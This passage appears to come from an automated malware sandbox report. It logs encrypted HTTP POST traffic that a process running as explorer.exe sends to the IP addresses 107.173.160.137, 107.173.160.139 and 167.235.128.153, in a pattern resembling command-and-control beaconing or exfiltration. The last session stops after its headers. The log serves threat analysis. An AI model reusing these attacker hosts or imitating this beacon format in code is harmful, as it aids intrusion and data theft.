                                                                              2024-07-27 12:54:10 UTC1122OUTData Raw: 64 32 37 34 6c 74 51 59 68 67 6e 66 76 65 53 41 6e 6d 33 33 76 58 70 46 32 50 2b 48 53 6b 35 62 49 4c 30 51 50 47 43 67 6f 5a 7a 6f 4a 43 31 63 6e 6e 47 2f 44 69 53 34 66 2f 46 74 77 4d 4b 63 6c 2f 44 74 67 44 44 31 4f 69 59 56 4d 39 6c 6b 41 70 58 63 35 43 77 45 7a 65 42 53 73 33 70 75 61 33 4d 76 43 6f 37 39 48 56 4e 67 44 34 32 36 79 4d 7a 72 52 47 31 4d 46 5a 79 79 37 39 4d 4f 70 50 57 56 4d 47 65 67 7a 59 6d 49 51 34 42 4d 37 4e 37 35 59 63 47 6d 6f 32 44 52 70 4b 30 72 48 79 30 53 61 44 44 58 68 49 45 59 32 34 79 50 78 5a 78 77 42 66 53 2f 45 66 2f 50 41 6d 66 61 64 5a 61 42 42 38 6a 35 5a 35 73 72 31 4e 56 54 44 61 44 6d 78 30 41 66 4e 35 32 6f 41 72 4b 78 54 72 78 7a 77 68 35 4b 53 6a 42 70 64 53 6b 56 31 65 34 51 33 6a 4f 75 31 47 61 43 45 6b 62
                                                                              Data Ascii: d274ltQYhgnfveSAnm33vXpF2P+HSk5bIL0QPGCgoZzoJC1cnnG/DiS4f/FtwMKcl/DtgDD1OiYVM9lkApXc5CwEzeBSs3pua3MvCo79HVNgD426yMzrRG1MFZyy79MOpPWVMGegzYmIQ4BM7N75YcGmo2DRpK0rHy0SaDDXhIEY24yPxZxwBfS/Ef/PAmfadZaBB8j5Z5sr1NVTDaDmx0AfN52oArKxTrxzwh5KSjBpdSkV1e4Q3jOu1GaCEkb
                                                                              2024-07-27 12:54:11 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:11 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:11 UTC685INData Raw: 63 59 4e 6c 73 78 63 66 31 4c 57 4c 44 41 48 2b 56 39 4c 2f 38 4f 6b 31 6d 52 52 70 46 55 4c 77 39 41 2b 4f 38 44 33 7a 55 37 31 41 51 36 5a 30 51 37 4a 41 50 56 30 62 66 63 44 6b 39 70 77 4a 32 45 56 44 47 63 38 4d 62 53 4c 62 77 7a 70 35 53 61 49 63 6a 61 58 49 57 75 61 56 65 4d 6d 6c 47 6d 4c 5a 2b 50 30 6d 67 38 38 72 6d 32 6e 35 62 56 30 58 71 58 76 65 4d 52 67 46 77 31 30 75 36 77 6f 43 36 30 6f 6f 37 38 49 7a 64 4b 61 70 6f 2b 57 66 50 44 46 30 4a 76 61 6e 6d 77 53 64 6c 6d 49 4a 61 38 30 4f 78 38 31 33 70 38 61 75 50 69 5a 35 45 32 6b 54 32 70 52 6d 63 34 4d 4b 66 4b 42 4d 66 43 73 79 30 31 64 67 67 51 66 76 2f 6b 6e 67 74 53 61 77 57 36 63 2f 47 78 70 4f 58 32 63 6f 71 76 41 76 67 53 35 4e 64 39 6f 5a 4b 78 4f 4b 43 35 33 67 33 52 46 2f 49 73 65
                                                                              Data Ascii: cYNlsxcf1LWLDAH+V9L/8Ok1mRRpFULw9A+O8D3zU71AQ6Z0Q7JAPV0bfcDk9pwJ2EVDGc8MbSLbwzp5SaIcjaXIWuaVeMmlGmLZ+P0mg88rm2n5bV0XqXveMRgFw10u6woC60oo78IzdKapo+WfPDF0JvanmwSdlmIJa80Ox813p8auPiZ5E2kT2pRmc4MKfKBMfCsy01dggQfv/kngtSawW6c/GxpOX2coqvAvgS5Nd9oZKxOKC53g3RF/Ise


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.449808107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:12 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:12 UTC1122OUTData Raw: 49 34 64 63 75 32 4f 51 61 75 6b 57 2b 31 63 6b 68 58 55 6d 36 6b 70 4b 2b 44 57 34 53 4c 6c 73 70 77 50 41 36 6f 61 65 41 51 38 31 55 55 45 44 75 33 65 4e 4c 4b 6a 57 33 51 4f 34 7a 63 38 6b 39 32 45 53 57 6a 69 55 36 73 54 4a 68 6d 64 48 42 4a 35 71 72 32 37 6a 6e 79 72 4d 36 64 30 75 66 44 51 2b 35 47 4e 72 51 52 45 53 44 58 52 76 57 79 32 35 6e 68 42 79 73 44 6a 6d 77 56 63 50 59 30 64 32 54 4b 71 56 2f 41 2f 32 46 48 38 73 77 4d 79 70 6d 2f 6f 52 77 51 64 4f 4c 69 57 4b 30 63 58 47 64 55 76 34 35 51 38 50 61 77 77 67 77 6c 37 63 52 55 5a 48 31 48 6e 55 73 32 54 65 6b 6c 58 44 4b 71 67 50 57 52 4a 4e 43 55 55 7a 76 75 57 4f 6d 4c 4c 6b 31 4b 58 38 36 55 2f 34 7a 4a 65 66 41 43 63 6e 61 6a 68 35 4c 58 46 4e 77 35 49 74 43 6f 55 53 4b 37 6a 2b 30 67 38
                                                                              Data Ascii: I4dcu2OQaukW+1ckhXUm6kpK+DW4SLlspwPA6oaeAQ81UUEDu3eNLKjW3QO4zc8k92ESWjiU6sTJhmdHBJ5qr27jnyrM6d0ufDQ+5GNrQRESDXRvWy25nhBysDjmwVcPY0d2TKqV/A/2FH8swMypm/oRwQdOLiWK0cXGdUv45Q8Pawwgwl7cRUZH1HnUs2TeklXDKqgPWRJNCUUzvuWOmLLk1KX86U/4zJefACcnajh5LXFNw5ItCoUSK7j+0g8
                                                                              2024-07-27 12:54:13 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:13 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:13 UTC685INData Raw: 76 4c 67 38 7a 65 69 64 57 59 66 30 62 2b 35 33 5a 66 38 6d 42 6e 51 69 4f 77 56 36 42 57 43 59 57 79 45 7a 66 79 79 33 6d 30 4d 52 38 42 75 78 75 41 53 59 67 64 30 57 69 6d 67 47 71 62 77 47 62 46 51 47 44 65 61 66 68 6e 2f 79 6b 61 45 56 63 4e 62 47 63 6d 6b 4d 51 72 7a 55 57 50 72 64 78 49 38 7a 54 46 69 39 6d 37 58 74 34 32 4c 69 56 6c 41 53 30 78 76 4e 37 7a 79 6a 7a 45 6d 4c 6a 2b 6e 6e 47 54 78 42 45 45 4a 5a 39 7a 55 54 58 6a 48 64 46 2b 51 4e 42 6e 6d 4c 31 48 6d 43 47 2f 71 6d 77 54 2f 70 53 63 57 54 47 65 6e 45 63 61 69 54 4a 34 6d 6b 6b 7a 78 2b 4b 37 6b 7a 4c 6f 50 41 56 55 78 50 6a 68 77 44 74 58 48 73 35 6c 56 65 79 4b 6e 70 48 46 67 6c 53 35 46 6f 46 61 67 7a 4e 49 36 49 47 72 42 34 69 52 63 68 58 56 46 4c 54 46 70 4f 6f 31 4d 59 4e 70 6d
                                                                              Data Ascii: vLg8zeidWYf0b+53Zf8mBnQiOwV6BWCYWyEzfyy3m0MR8BuxuASYgd0WimgGqbwGbFQGDeafhn/ykaEVcNbGcmkMQrzUWPrdxI8zTFi9m7Xt42LiVlAS0xvN7zyjzEmLj+nnGTxBEEJZ9zUTXjHdF+QNBnmL1HmCG/qmwT/pScWTGenEcaiTJ4mkkzx+K7kzLoPAVUxPjhwDtXHs5lVeyKnpHFglS5FoFagzNI6IGrB4iRchXVFLTFpOo1MYNpm


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.449809107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:14 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:14 UTC1122OUTData Raw: 6f 49 52 58 75 51 6a 47 4a 78 78 66 44 7a 52 34 33 5a 52 30 45 37 55 42 35 35 53 78 39 6e 63 51 74 6f 4e 52 31 4a 6c 2f 64 4f 50 41 58 76 4a 54 58 4c 6d 6b 77 58 67 4d 4d 6a 2f 2f 36 52 65 4b 36 65 65 77 38 35 78 64 70 66 34 31 4f 54 4b 6e 63 70 41 31 47 4a 41 4b 59 69 63 71 78 46 54 34 4b 71 66 51 54 2f 45 63 73 67 78 2f 6d 71 4c 72 32 49 6a 4d 75 2f 6a 57 53 49 41 72 75 2f 7a 58 59 47 59 55 42 45 63 75 39 52 38 56 63 38 45 4c 32 6c 59 4d 67 45 39 5a 31 55 6e 71 47 34 6d 41 41 4d 77 51 70 57 56 70 2b 64 5a 5a 4a 61 69 65 4e 70 32 43 6d 75 53 68 48 30 50 58 55 61 65 79 56 52 4c 61 2b 43 36 78 68 6b 53 58 61 76 73 68 39 69 4c 69 2b 70 44 70 6f 45 61 54 65 52 69 45 2f 33 63 44 7a 51 2b 51 78 69 55 6a 70 33 62 76 70 53 56 38 6a 4c 75 69 66 2b 4b 44 37 38 78
                                                                              Data Ascii: oIRXuQjGJxxfDzR43ZR0E7UB55Sx9ncQtoNR1Jl/dOPAXvJTXLmkwXgMMj//6ReK6eew85xdpf41OTKncpA1GJAKYicqxFT4KqfQT/Ecsgx/mqLr2IjMu/jWSIAru/zXYGYUBEcu9R8Vc8EL2lYMgE9Z1UnqG4mAAMwQpWVp+dZZJaieNp2CmuShH0PXUaeyVRLa+C6xhkSXavsh9iLi+pDpoEaTeRiE/3cDzQ+QxiUjp3bvpSV8jLuif+KD78x
                                                                              2024-07-27 12:54:15 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:15 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:15 UTC685INData Raw: 6f 63 7a 66 2b 79 6d 75 31 69 4e 4f 35 70 32 51 6a 46 71 57 36 5a 59 47 48 30 62 34 41 50 45 57 38 4c 49 69 61 56 4d 70 73 35 4c 79 78 51 37 5a 52 63 6f 55 2f 42 2b 74 52 6e 43 59 47 6e 48 45 73 75 76 75 4c 48 44 4f 31 66 74 55 75 77 66 38 31 6e 30 2f 7a 70 30 4c 34 34 70 36 77 67 73 65 49 73 75 37 52 4c 35 51 49 38 6a 48 71 42 43 39 37 59 35 31 65 53 59 39 4b 50 6b 6f 63 2b 46 72 53 6d 49 36 32 49 6c 38 5a 61 67 32 47 30 50 2f 4f 64 70 4f 6f 50 72 69 75 54 6d 54 72 77 67 47 46 67 73 46 77 76 58 78 58 73 63 66 31 70 4d 2b 67 55 78 69 66 39 5a 34 51 56 63 2f 4a 42 74 75 2b 2f 52 59 66 44 4f 54 6a 35 6b 65 74 68 69 35 4a 70 37 4d 58 4a 64 61 33 54 51 59 6d 36 66 34 78 6e 70 2b 49 64 33 5a 39 35 78 36 53 45 4a 37 35 30 45 2f 57 33 53 51 5a 6e 46 69 6c 34 72
                                                                              Data Ascii: oczf+ymu1iNO5p2QjFqW6ZYGH0b4APEW8LIiaVMps5LyxQ7ZRcoU/B+tRnCYGnHEsuvuLHDO1ftUuwf81n0/zp0L44p6wgseIsu7RL5QI8jHqBC97Y51eSY9KPkoc+FrSmI62Il8Zag2G0P/OdpOoPriuTmTrwgGFgsFwvXxXscf1pM+gUxif9Z4QVc/JBtu+/RYfDOTj5kethi5Jp7MXJda3TQYm6f4xnp+Id3Z95x6SEJ750E/W3SQZnFil4r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.449810167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:16 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:16 UTC1122OUTData Raw: 61 72 2b 68 6d 6f 4e 35 42 34 44 67 4a 4b 53 38 4b 76 43 44 71 42 46 73 50 5a 32 50 74 65 70 32 55 56 70 46 6a 2b 69 63 47 36 64 39 6e 36 57 34 4f 41 35 63 39 74 4f 45 4d 52 75 46 64 51 70 58 4b 45 70 4f 75 37 6e 68 48 63 4d 69 75 6e 4b 48 52 56 78 35 56 6f 66 2f 4c 79 4e 35 33 33 73 31 4d 30 62 51 6d 33 5a 32 70 2f 39 63 74 38 61 46 57 71 42 35 41 42 4f 56 51 52 7a 65 2b 63 71 4d 4b 5a 44 61 68 6d 75 52 58 56 59 7a 41 55 65 4a 56 30 4b 39 39 6e 34 61 35 41 58 6d 5a 49 51 71 32 53 73 43 41 74 43 79 67 49 75 57 63 6f 36 68 68 57 78 41 55 77 34 5a 75 33 31 49 75 49 36 52 57 53 77 73 76 51 67 74 79 44 77 4e 64 37 7a 43 53 6e 4a 72 35 54 6b 4a 7a 66 41 38 56 36 41 38 46 2b 74 30 63 72 65 2f 2f 2b 46 4a 68 76 50 32 4d 37 46 30 64 4a 38 32 78 74 37 63 72 31 71
                                                                              Data Ascii: ar+hmoN5B4DgJKS8KvCDqBFsPZ2Ptep2UVpFj+icG6d9n6W4OA5c9tOEMRuFdQpXKEpOu7nhHcMiunKHRVx5Vof/LyN533s1M0bQm3Z2p/9ct8aFWqB5ABOVQRze+cqMKZDahmuRXVYzAUeJV0K99n4a5AXmZIQq2SsCAtCygIuWco6hhWxAUw4Zu31IuI6RWSwsvQgtyDwNd7zCSnJr5TkJzfA8V6A8F+t0cre//+FJhvP2M7F0dJ82xt7cr1q
                                                                              2024-07-27 12:54:17 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:17 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:17 UTC685INData Raw: 78 50 67 63 53 76 6c 57 6b 55 44 34 6d 6b 44 30 46 56 58 42 56 78 41 6e 4e 36 33 56 43 44 6a 59 50 71 54 4c 6c 55 4a 42 44 72 42 50 72 37 48 50 46 72 43 79 44 35 74 67 2b 45 67 63 6d 33 38 56 2f 34 76 59 69 72 62 71 46 57 58 5a 77 71 32 69 69 37 38 69 75 6c 6a 69 66 71 68 42 55 39 50 59 6e 39 68 6a 32 54 62 44 68 61 4c 42 56 56 53 55 64 6c 30 61 37 52 44 74 79 45 65 68 49 75 6d 6b 46 57 4b 79 55 4a 46 56 6e 50 58 31 6f 4f 75 71 47 6d 69 4a 6e 39 54 53 72 34 74 4d 50 56 36 63 4e 71 59 39 61 62 7a 6d 6e 51 6c 62 4f 54 57 46 58 33 65 69 65 4c 43 6d 66 45 4b 4d 6b 49 68 43 35 70 44 65 39 4e 64 37 57 5a 48 48 74 59 50 49 6e 57 62 2b 38 4c 62 65 67 73 30 33 36 4a 61 63 75 2b 4c 43 36 35 47 38 6b 34 6e 50 49 48 2f 4c 4d 74 73 78 48 6e 30 35 31 73 4b 47 5a 4b 42
                                                                              Data Ascii: xPgcSvlWkUD4mkD0FVXBVxAnN63VCDjYPqTLlUJBDrBPr7HPFrCyD5tg+Egcm38V/4vYirbqFWXZwq2ii78iuljifqhBU9PYn9hj2TbDhaLBVVSUdl0a7RDtyEehIumkFWKyUJFVnPX1oOuqGmiJn9TSr4tMPV6cNqY9abzmnQlbOTWFX3eieLCmfEKMkIhC5pDe9Nd7WZHHtYPInWb+8Lbegs036Jacu+LC65G8k4nPIH/LMtsxHn051sKGZKB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.449811107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:17 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:17 UTC1122OUTData Raw: 70 69 32 74 78 7a 4c 67 6d 39 34 7a 38 41 71 39 52 31 62 32 58 67 73 66 72 49 33 48 4a 54 79 64 53 50 2b 6f 72 4d 4f 4f 39 55 6f 37 63 74 49 41 68 56 59 31 77 64 38 38 2b 38 72 4c 47 30 61 2b 57 39 62 54 33 70 55 45 51 2f 6c 63 54 6b 55 56 32 6b 54 55 36 52 77 6f 43 31 39 6f 47 6a 4b 43 72 64 76 59 6d 37 45 58 79 79 52 47 59 46 57 4d 2b 38 56 76 39 35 62 73 45 38 4d 35 49 42 55 59 4b 51 66 4f 68 79 58 53 4c 52 63 4e 2b 56 6d 38 45 4b 6e 53 33 6c 31 34 75 76 4b 4c 5a 35 59 72 4f 4a 71 63 4e 31 45 73 6b 32 49 67 4b 57 73 61 37 35 71 51 47 6d 61 32 4c 41 74 32 73 4d 4a 43 50 35 67 74 6d 65 2b 70 6e 41 70 30 4e 42 51 46 4b 53 51 67 4e 53 66 37 36 76 33 77 2b 77 31 56 43 61 31 4f 49 39 43 2f 66 4a 2f 33 31 43 67 64 51 70 38 69 34 44 6c 57 4e 53 7a 71 70 58 39
                                                                              Data Ascii: pi2txzLgm94z8Aq9R1b2XgsfrI3HJTydSP+orMOO9Uo7ctIAhVY1wd88+8rLG0a+W9bT3pUEQ/lcTkUV2kTU6RwoC19oGjKCrdvYm7EXyyRGYFWM+8Vv95bsE8M5IBUYKQfOhyXSLRcN+Vm8EKnS3l14uvKLZ5YrOJqcN1Esk2IgKWsa75qQGma2LAt2sMJCP5gtme+pnAp0NBQFKSQgNSf76v3w+w1VCa1OI9C/fJ/31CgdQp8i4DlWNSzqpX9
                                                                              2024-07-27 12:54:19 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:19 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:19 UTC685INData Raw: 78 61 58 6b 4a 50 70 64 4a 71 59 61 47 2f 58 30 62 34 74 2b 49 41 73 64 79 61 78 62 30 6d 45 37 63 58 33 76 71 79 4b 35 49 45 64 58 55 75 4a 2b 4a 69 6d 75 4c 77 71 35 6f 5a 2b 74 49 59 35 37 30 4e 4c 39 42 36 53 49 6a 4a 68 71 4f 4c 61 38 54 67 76 35 55 4e 67 70 71 4e 45 6d 53 43 58 74 32 67 76 50 6b 72 75 61 4a 39 6f 43 33 4c 77 37 78 4e 70 33 56 57 32 35 39 36 30 35 64 61 4e 4c 38 30 45 6c 76 4d 6b 6a 38 68 31 70 74 6a 44 51 37 7a 67 41 2b 52 79 59 79 6b 44 38 56 59 39 77 54 4e 45 38 73 75 41 69 67 48 56 7a 63 72 56 79 2f 35 47 79 51 68 59 69 72 63 64 35 58 30 4f 4b 41 70 77 45 49 70 47 45 2b 47 4c 39 72 6d 41 70 61 46 53 31 38 78 6a 2b 75 61 6d 69 4f 71 6f 71 36 74 48 34 50 4a 4c 4c 46 75 50 67 63 67 4b 2f 4f 33 69 36 62 51 37 6e 66 6b 63 61 30 34 34
                                                                              Data Ascii: xaXkJPpdJqYaG/X0b4t+IAsdyaxb0mE7cX3vqyK5IEdXUuJ+JimuLwq5oZ+tIY570NL9B6SIjJhqOLa8Tgv5UNgpqNEmSCXt2gvPkruaJ9oC3Lw7xNp3VW259605daNL80ElvMkj8h1ptjDQ7zgA+RyYykD8VY9wTNE8suAigHVzcrVy/5GyQhYircd5X0OKApwEIpGE+GL9rmApaFS18xj+uamiOqoq6tH4PJLLFuPgcgK/O3i6bQ7nfkca044


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.449812107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:20 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:20 UTC1267OUTData Raw: 4a 4a 68 79 76 47 46 4e 6b 41 77 67 56 68 6b 2f 4a 74 31 6b 62 57 31 51 39 70 61 44 79 66 61 47 6e 45 73 34 4e 4a 2f 6b 6e 53 6c 44 58 42 4d 4b 4c 6f 47 50 38 31 67 78 55 4b 76 5a 4d 4b 34 2f 31 4e 74 71 55 2f 30 6d 65 2f 57 53 30 67 67 31 71 38 2b 54 6c 6d 4d 4b 31 50 6c 4a 43 69 4a 59 59 39 6a 45 33 48 2b 31 76 62 76 6d 71 4a 6f 61 69 69 33 6e 36 34 69 6c 4b 5a 52 54 59 2b 67 62 30 51 4b 43 52 4b 6e 43 49 58 68 38 63 4a 78 78 78 46 6b 52 45 52 41 6e 6c 71 2b 79 52 2f 32 33 65 51 47 55 56 70 68 6e 4c 63 68 42 71 57 50 63 6c 37 43 45 64 6c 6b 78 78 37 64 58 68 49 41 77 76 69 4e 72 37 62 35 7a 52 67 4f 77 56 47 4a 4e 43 7a 38 52 4c 33 77 49 34 4d 50 73 59 66 34 41 42 59 7a 71 4a 77 55 66 44 2f 31 39 6e 76 61 4a 4a 73 34 77 69 63 50 7a 54 66 45 71 51 6a 5a
                                                                              Data Ascii: JJhyvGFNkAwgVhk/Jt1kbW1Q9paDyfaGnEs4NJ/knSlDXBMKLoGP81gxUKvZMK4/1NtqU/0me/WS0gg1q8+TlmMK1PlJCiJYY9jE3H+1vbvmqJoaii3n64ilKZRTY+gb0QKCRKnCIXh8cJxxxFkRERAnlq+yR/23eQGUVphnLchBqWPcl7CEdlkxx7dXhIAwviNr7b5zRgOwVGJNCz8RL3wI4MPsYf4ABYzqJwUfD/19nvaJJs4wicPzTfEqQjZ
                                                                              2024-07-27 12:54:21 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:21 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:21 UTC685INData Raw: 4e 44 53 4d 76 65 6e 7a 53 52 74 79 4b 37 5a 41 49 39 4c 4a 62 6d 45 56 4e 6a 4d 41 71 44 73 73 51 31 43 78 55 4b 4e 52 41 6b 33 58 62 62 72 4f 66 70 4c 59 51 33 76 74 34 65 58 79 4e 2f 4d 54 4e 57 37 51 6a 75 52 2f 62 6d 68 2f 61 4d 33 71 6a 64 42 4a 62 4a 37 52 67 78 7a 78 35 71 43 33 73 5a 69 4b 4d 46 4c 31 31 63 44 71 78 66 79 31 68 53 5a 71 4c 4e 66 6c 70 76 78 74 6b 78 4e 35 4f 36 33 72 51 6d 6e 4d 75 36 62 65 52 63 62 77 6d 59 33 68 57 31 4f 54 57 33 32 69 54 45 47 7a 7a 74 69 43 69 53 56 4c 51 71 6c 52 6a 78 36 64 47 52 62 4d 4a 56 48 59 54 4e 54 6b 59 55 6a 72 50 43 56 71 47 6a 78 71 5a 38 5a 78 57 53 62 72 32 4b 42 70 73 4c 59 54 58 70 33 38 6c 47 2f 4b 54 4a 33 65 49 47 4c 77 34 79 52 67 2f 32 66 59 36 4e 79 51 4c 53 66 53 64 35 44 49 49 74 31
                                                                              Data Ascii: NDSMvenzSRtyK7ZAI9LJbmEVNjMAqDssQ1CxUKNRAk3XbbrOfpLYQ3vt4eXyN/MTNW7QjuR/bmh/aM3qjdBJbJ7Rgxzx5qC3sZiKMFL11cDqxfy1hSZqLNflpvxtkxN5O63rQmnMu6beRcbwmY3hW1OTW32iTEGzztiCiSVLQqlRjx6dGRbMJVHYTNTkYUjrPCVqGjxqZ8ZxWSbr2KBpsLYTXp38lG/KTJ3eIGLw4yRg/2fY6NyQLSfSd5DIIt1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.449813167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:22 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:22 UTC1122OUTData Raw: 65 32 64 59 47 55 65 69 45 52 41 61 4e 45 63 6b 68 56 74 31 5a 31 42 30 37 33 6a 75 4c 74 4e 34 73 31 57 70 6e 6d 68 37 44 37 55 4f 67 38 39 67 4b 70 62 4c 33 44 53 31 53 68 52 5a 78 37 56 56 56 64 7a 51 73 43 4c 35 68 46 61 54 44 54 65 51 2f 54 2b 50 63 4d 51 39 73 46 6e 46 38 4e 43 51 66 2b 55 31 72 78 69 6d 79 6d 49 61 51 56 54 31 54 35 34 33 7a 45 4f 7a 69 67 49 48 4c 4d 44 64 42 54 67 47 78 61 58 4f 43 68 6c 47 59 6c 36 67 62 35 2f 76 62 54 38 4d 63 31 6e 2f 41 33 57 33 52 42 64 68 47 74 51 58 66 76 2b 37 57 34 4a 33 67 75 49 68 76 69 38 7a 72 72 74 78 46 76 58 34 79 5a 74 61 59 73 50 77 47 53 5a 67 4a 77 4a 33 68 34 39 33 67 58 55 4f 73 5a 4c 51 6a 71 68 79 66 44 74 6b 48 30 6d 65 65 5a 53 36 37 59 69 48 53 72 49 44 4b 6c 58 4f 6c 50 68 33 46 63 36
                                                                              Data Ascii: e2dYGUeiERAaNEckhVt1Z1B073juLtN4s1Wpnmh7D7UOg89gKpbL3DS1ShRZx7VVVdzQsCL5hFaTDTeQ/T+PcMQ9sFnF8NCQf+U1rximymIaQVT1T543zEOzigIHLMDdBTgGxaXOChlGYl6gb5/vbT8Mc1n/A3W3RBdhGtQXfv+7W4J3guIhvi8zrrtxFvX4yZtaYsPwGSZgJwJ3h493gXUOsZLQjqhyfDtkH0meeZS67YiHSrIDKlXOlPh3Fc6
                                                                              2024-07-27 12:54:23 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:23 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:23 UTC685INData Raw: 53 31 72 33 51 38 4a 2b 35 4e 44 39 76 6b 6a 4d 35 4b 69 2f 44 31 4b 4d 78 6d 35 68 78 55 47 36 42 7a 77 2b 6a 70 5a 6f 52 48 4b 52 4b 56 63 7a 70 42 71 42 6a 7a 76 30 48 65 59 6f 64 39 34 48 4a 32 73 48 54 4e 4a 51 59 62 79 33 6d 79 37 51 31 43 4d 77 64 6b 4c 5a 57 63 6a 73 58 37 7a 49 53 4c 77 51 38 31 63 63 2b 55 42 76 63 57 38 4c 43 2f 36 2b 4c 6e 30 68 4b 76 79 51 38 62 66 77 52 69 6e 74 4e 6d 65 47 51 31 47 6d 4d 4b 4e 34 44 7a 49 54 6c 4f 37 73 70 7a 31 63 4f 30 6a 4c 2f 4f 33 57 55 33 38 77 47 5a 65 56 32 6d 34 57 69 70 66 5a 61 72 5a 56 53 30 77 62 68 65 52 56 57 35 33 42 54 66 7a 76 72 70 46 48 36 2f 79 44 54 69 53 48 77 42 6a 74 48 34 45 70 77 54 4f 51 73 42 68 70 68 45 6d 68 45 52 75 70 43 78 32 4f 59 4b 6a 67 30 69 76 4e 36 4d 55 38 78 46 63
                                                                              Data Ascii: S1r3Q8J+5ND9vkjM5Ki/D1KMxm5hxUG6Bzw+jpZoRHKRKVczpBqBjzv0HeYod94HJ2sHTNJQYby3my7Q1CMwdkLZWcjsX7zISLwQ81cc+UBvcW8LC/6+Ln0hKvyQ8bfwRintNmeGQ1GmMKN4DzITlO7spz1cO0jL/O3WU38wGZeV2m4WipfZarZVS0wbheRVW53BTfzvrpFH6/yDTiSHwBjtH4EpwTOQsBhphEmhERupCx2OYKjg0ivN6MU8xFc


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.449814107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:24 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
